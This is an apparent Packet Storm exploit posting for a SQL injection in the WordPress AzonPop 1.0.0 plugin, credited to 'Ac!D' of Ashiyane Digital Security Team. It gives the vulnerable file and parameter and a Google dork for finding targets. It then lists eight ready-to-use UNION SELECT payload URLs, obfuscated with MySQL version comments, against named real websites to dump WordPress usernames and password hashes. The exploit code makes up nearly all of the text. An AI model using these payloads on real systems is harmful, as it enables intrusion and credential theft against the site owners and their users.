WordPress AzonPop 1.0.0 SQL Injection

2016-01-08T00:00:00
ID PACKETSTORM:135192
Type packetstorm
Reporter Ac!D
Modified 2016-01-08T00:00:00

Description

                                        
                                            `[*][*][*][*][*][*][*][*][*][*][*]  
[*] Exploit Title : Wordpress AzonPop Plugin SQL Injection  
[*] Exploit Author : Ashiyane Digital Security Team  
[*] Vendor Homepage : azonpop.blogspot.com  
[*] Google Dork : inurl:wp-content/plugins/azonpop  
[*] Date: 8 Jan 2016  
[*] Tested On : Win 10 | CyberFox Browser  
[*]  
[*][*][*][*][*][*][*][*][*][*][]  
[*] Vulnerable PHP File = /AzonPop/files/view/showpopup.php  
[*] Vulnerable Parameter = popid  
[*]  
[*] Injection :   
site.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=   
-->SQL injection <--  
[*]  
[*] Demos :  
[*]  
[*]   
http://www.laredmexicoelpaso.org/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://haircareproducts.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://arthritispain.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://buyrealestate.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://coffeemachines.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://anxiety.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*]   
http://babyshower.giftbuy.info/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000Group_gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)),0x3c2f62723e)*/,4,5 /*!00000from*/   
wp_psjt8e_users  
[*]  
[*]   
http://diabetescare.siterubix.com/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/   
wp_users  
[*]  
[*][*][*][*][*][*][*][*][*][*][*]  
[*] Discovered by : Ac!D  
[*] tnQ : H.empire , M.hidden , M.hacking , Sh.BlackHAT , V for   
vendetta , Sh.Cloner & aMo0 Hassan :)  
[*][*][*][*][*][*][*][*][*][*][*]  
`